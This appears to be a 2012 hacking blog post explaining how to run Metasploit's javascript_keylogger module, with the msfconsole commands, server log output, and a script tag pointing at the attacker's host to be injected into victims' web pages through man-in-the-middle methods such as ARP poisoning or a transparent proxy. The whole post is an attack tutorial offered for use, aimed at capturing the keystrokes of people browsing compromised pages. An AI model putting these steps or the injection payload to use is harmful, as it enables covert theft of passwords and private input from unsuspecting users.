[Metasploit] How to use javascript_keylogger Module :D

It’ just been added to metasploit the form:
javascript_keylogger

This module is very useful during a MITM or after entering a site.

Let's see how to use :D

Ok now we can proceed :D
We update Metasploit:
sudo msfupdate

We start Metasploit:
sudo msfconsole

Let the form:
search javascript keylogger

Use:
auxiliary/server/capture/javascript_keylogger

Now let's see the options:
show options

Once we start the server configured :)
First remember to stop any apache / web server on port 80:
sudo service apache2 stop

Run and type:
[*] Starting keylogger. Please press [CTRl]+[C] if you wish to terminate.
[*] Using URL: http://192.168.1.190:80/
[*] Server started.
[*] 192.168.1.190 - [05/Feb/2012:09:41:02 UTC] - [HTTP GET] - /metasploit
[*] 192.168.1.190 - [05/Feb/2012:09:41:02 UTC] - [HTTP GET] - /tOfpzuCWLJsM.js
[*] 192.168.1.190 - [05/Feb/2012:09:41:06 UTC] - [HTTP GET] - /tOfpzuCWLJsM.js

Well now we now have many ways to inject javascript into the web pages that generates:
<script type="text/javascript" src="http://192.168.1.190:80/jstOfpzuCWLJsM.js"></script>

I suggest the following :D
[RUBY]Transparent Proxy && Inject HTML/JAVASCRIPT

Or we can use paros proxy or ZEP :)

Arp poisoning with scapy and web request spoofed with paros proxy on Backbox

Related posts:

1. [Metasploit] How to add UNSTABLE module :)
2. CVE-2010-3765: Mozilla Firefox remote code Excution module for metasploit
3. XSS: MORE POWER WITH Beef and Metasploit
4. [How-To]Metasploit && XSSF – Cross-Site Scripting Framework v.2.1
5. [CVE-2010-2568]Metasploit:windows Oday Remote Code Exuction

This entry was posted on Sunday, February 5th, 2012 at 9:56 am and is filed under GNU/Linux, Hacking, Software. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.

Tagged with: metasploit • mitm